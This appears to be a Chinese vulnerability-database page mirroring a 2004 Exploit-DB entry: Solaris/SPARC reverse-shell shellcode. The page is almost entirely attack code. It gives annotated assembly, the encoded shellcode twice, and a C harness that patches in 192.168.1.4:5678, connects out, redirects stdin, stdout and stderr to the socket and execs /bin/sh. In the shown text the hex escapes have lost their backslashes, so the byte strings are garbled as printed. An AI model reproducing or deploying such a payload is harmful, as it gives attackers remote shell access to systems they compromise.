Solaris/SPARC – Reverse (192.168.1.4:5678/TCP) Shell (/bin/sh) Shellcode (204 bytes)

Solaris/SPARC – Reverse (192.168.1.4:5678/TCP) Shell (/bin/sh) Shellcode (204 bytes)

漏洞ID 1054637 漏洞类型
发布时间 2004-09-26 更新时间 2004-09-26
图片[1]-Solaris/SPARC – Reverse (192.168.1.4:5678/TCP) Shell (/bin/sh) Shellcode (204 bytes)-安全小百科CVE编号 N/A
图片[2]-Solaris/SPARC – Reverse (192.168.1.4:5678/TCP) Shell (/bin/sh) Shellcode (204 bytes)-安全小百科CNNVD-ID N/A
漏洞平台 Solaris_SPARC CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/13496
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
 * Solaris shellcode - connects /bin/sh to a host
 *
 * Claes M. Nyberg 20020624
 * <[email protected]>, <[email protected]>
 */

#include <string.h>

/***********************************************************
void
main(void)
{

__asm__("
       
        ! Create socket
        mov    0x2, %o0         ! o0 = AF_INET
        mov    0x2, %o1         ! o1 = SOCK_STREAM
        xor    %o2, %o2, %o2    ! o2 = 0
        mov    0xe6, %g1        ! g1 = 230 = SYS_so_socket
        ta     8                ! socket(AF_INET, SOCK_STREAM, 0);
        add    %o0, 0x1, %l0    ! l0 = socket_fd +1 

        ! Server address
        mov    0xc0, %l1        ! 192
        sll    %l1, 0x8, %l1    ! 192.0
        or     0xa8, %l1, %l1   ! 192.168
        sll    %l1, 0x8, %l1    ! 192.168.0
        or     0x1, %l1, %l1    ! 192.168.1
        sll    %l1, 0x8, %l1    ! 192.168.1.0
        or     0x1, %l1, %l1    ! 192.168.1.1
        st     %l1, [%sp - 12]  ! Server IP 
        mov    0x2, %l1         ! AF_INET
        sth    %l1, [%sp -16]   ! Server family
        mov    0x30, %l1        ! High order byte of Port
        sll    %l1, 0x8, %l1    ! << 
        or     0x39, %l1, %l1   ! Low order byte of port
        sth    %l1, [%sp - 14]  ! Server port

        ! Connect
        sub    %sp, 16, %o1     ! o1 = &server
        mov    0x10, %o2        ! o2 = 16 = sizeof(struct sockaddr_in)
        mov    0xeb, %g1        ! g1 = 235 = SYS_connect
        ta     8                ! connect(socket_fd, &server, 16);

        ! Set up IO              
        sub    %l0, 0x1, %o0    ! o0 = socket_fd
        mov    0x9, %o1         ! o1 = F_DUP2FD
        xor    %o2, %o2, %o2    ! o2 = 0 = STDIN_FILENO
        mov    0x3e, %g1        ! g1 = 62 = SYS_fcntl
        ta     8                ! fcntl(socket_fd, F_DUP2FD, STDIN_FILENO);
        sub    %l0, 0x1, %o0    ! o0 = socket_fd
        mov    0x1, %o2         ! o2 = 1 = STDOUT_FILENO
        ta     8                ! fcntl(socket_fd, F_DUP2FD, STDOUT_FILENO);
        sub    %l0, 0x1, %o0    ! o0 = socket_fd
        mov    0x2, %o2         ! o2 = 1 = STDERR_FILENO
        ta     8                ! fcntl(socket_fd, F_DUP2FD, STDERR_FILENO);
        
        ! Execve /bin/sh
        xor    %o2, %o2, %o2    ! o2 = 0 => envp = NULL
        set    0x2f62696e, %l0  ! lo = '/bin'
        set    0x2f2f7368, %l1  ! l1 = '//sh'    
        st     %o2, [%sp - 4]   ! String ends with NULL 
        st     %l1, [%sp - 8]   ! Write //sh to stack
        st     %l0, [%sp - 12]  ! Write /bin to stack
        sub    %sp, 12, %o0     ! o0 = &string
        st     %o2, [%sp - 16]  ! argv[1] = NULL
        st     %o0, [%sp - 20]  ! argv[0] = &string
        sub    %sp, 20, %o1     ! o1 = &string
        mov    0x3b, %g1        ! g1 = 59 = SYS_execve
        ta     8                ! execve(argv[0], argv, NULL);

        ! Exit 
        mov    1, %g1           ! g1 = 1 = SYS_exit
        ta     8                ! exit();
    ");
}
***********************************************************/

/* Index of low order byte in IP address */
#define IP0       51    
#define IP1       43
#define IP2       35
#define IP3       27

/* Index of low order byte in port */
#define P0        75    
#define P1        67  

static char solaris_code[] =
    
    /* Create socket */
    "x90x10x20x02"   /* mov     2, %o0               */
    "x92x10x20x02"   /* mov     2, %o1               */
    "x94x1ax80x0a"   /* xor     %o2, %o2, %o2        */
    "x82x10x20xe6"   /* mov     230, %g1             */
    "x91xd0x20x08"   /* ta      0x8                  */
    "xa0x02x20x01"   /* add     %o0, 1, %l0          */

    /* Server address */
    "xa2x10x20xc0"   /* mov     192, %l1             */
    "xa3x2cx60x08"   /* sll     %l1, 8, %l1          */
    "xa2x14x60xa8"   /* or      %l1, 168, %l1        */
    "xa3x2cx60x08"   /* sll     %l1, 8, %l1          */
    "xa2x14x60x01"   /* or      %l1, 1, %l1          */
    "xa3x2cx60x08"   /* sll     %l1, 8, %l1          */
    "xa2x14x60x01"   /* or      %l1, 1, %l1          */
    "xe2x23xbfxf4"   /* st      %l1, [%sp - 12]      */
    "xa2x10x20x02"   /* mov     2, %l1               */
    "xe2x33xbfxf0"   /* sth     %l1, [%sp - 16]      */
    "xa2x10x20x30"   /* mov     48, %l1              */
    "xa3x2cx60x08"   /* sll     %l1, 8, %l1          */
    "xa2x14x60x39"   /* or      %l1, 57, %l1         */
    "xe2x33xbfxf2"   /* sth     %l1, [%sp - 14]      */

    /* Connect */
    "x92x23xa0x10"   /* sub     %sp, 16, %o1         */
    "x94x10x20x10"   /* mov     16, %o2              */
    "x82x10x20xeb"   /* mov     235, %g1             */
    "x91xd0x20x08"   /* ta      0x8                  */

    /* Set up IO */
    "x90x24x20x01"   /* sub     %l0, 1, %o0          */
    "x92x10x20x09"   /* mov     9, %o1               */
    "x94x1ax80x0a"   /* xor     %o2, %o2, %o2        */
    "x82x10x20x3e"   /* mov     62, %g1              */
    "x91xd0x20x08"   /* ta      0x8                  */
    "x90x24x20x01"   /* sub     %l0, 1, %o0          */
    "x94x10x20x01"   /* mov     1, %o2               */
    "x91xd0x20x08"   /* ta      0x8                  */
    "x90x24x20x01"   /* sub     %l0, 1, %o0          */
    "x94x10x20x02"   /* mov     2, %o2               */
    "x91xd0x20x08"   /* ta      0x8                  */

    /* Execve /bin/sh */
    "x94x1ax80x0a"   /* xor     %o2, %o2, %o2        */
    "x21x0bxd8x9a"   /* sethi   %hi(0x2f626800), %l0 */
    "xa0x14x21x6e"   /* or      %l0, 0x16e, %l0      */
    "x23x0bxcbxdc"   /* sethi   %hi(0x2f2f7000), %l1 */
    "xa2x14x63x68"   /* or      %l1, 0x368, %l1      */
    "xd4x23xbfxfc"   /* st      %o2, [%sp - 4]       */
    "xe2x23xbfxf8"   /* st      %l1, [%sp - 8]       */
    "xe0x23xbfxf4"   /* st      %l0, [%sp - 12]      */
    "x90x23xa0x0c"   /* sub     %sp, 12, %o0         */
    "xd4x23xbfxf0"   /* st      %o2, [%sp - 16]      */
    "xd0x23xbfxec"   /* st      %o0, [%sp - 20]      */
    "x92x23xa0x14"   /* sub     %sp, 20, %o1         */
    "x82x10x20x3b"   /* mov     59, %g1              */
    "x91xd0x20x08"   /* ta      0x8                  */

    /* Exit */
    "x82x10x20x01"   /* mov     1, %g1               */
    "x91xd0x20x08";  /* ta      0x8                  */


static char _solaris_code[] =
    "x90x10x20x02x92x10x20x02x94x1ax80x0ax82x10x20xe6"
    "x91xd0x20x08xa0x02x20x01xa2x10x20xc0xa3x2cx60x08"
    "xa2x14x60xa8xa3x2cx60x08xa2x14x60x01xa3x2cx60x08"
    "xa2x14x60x01xe2x23xbfxf4xa2x10x20x02xe2x33xbfxf0"
    "xa2x10x20x30xa3x2cx60x08xa2x14x60x39xe2x33xbfxf2"
    "x92x23xa0x10x94x10x20x10x82x10x20xebx91xd0x20x08"
    "x90x24x20x01x92x10x20x09x94x1ax80x0ax82x10x20x3e"
    "x91xd0x20x08x90x24x20x01x94x10x20x01x91xd0x20x08"
    "x90x24x20x01x94x10x20x02x91xd0x20x08x94x1ax80x0a"
    "x21x0bxd8x9axa0x14x21x6ex23x0bxcbxdcxa2x14x63x68"
    "xd4x23xbfxfcxe2x23xbfxf8xe0x23xbfxf4x90x23xa0x0c"
    "xd4x23xbfxf0xd0x23xbfxecx92x23xa0x14x82x10x20x3b"
    "x91xd0x20x08x82x10x20x01x91xd0x20x08";

int
main(void)
{
    void (*code)() = (void *)_solaris_code;
    
    _solaris_code[IP0] = 4;
    _solaris_code[IP1] = 1;
    _solaris_code[IP2] = 168;
    _solaris_code[IP3] = 192;

    _solaris_code[P0] = 0x2e;
    _solaris_code[P1] = 0x16;

    printf("Shellcode length: %dn", strlen(_solaris_code));

	/* Connect to 192.168.1.4:5678 */
    code();
    return(1);
}    

// milw0rm.com [2004-09-26]

相关推荐: Netscape JavaScript Cache Browsing Vulnerability

Netscape JavaScript Cache Browsing Vulnerability 漏洞ID 1104871 漏洞类型 Access Validation Error 发布时间 1998-09-29 更新时间 1998-09-29 CVE编号 N…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享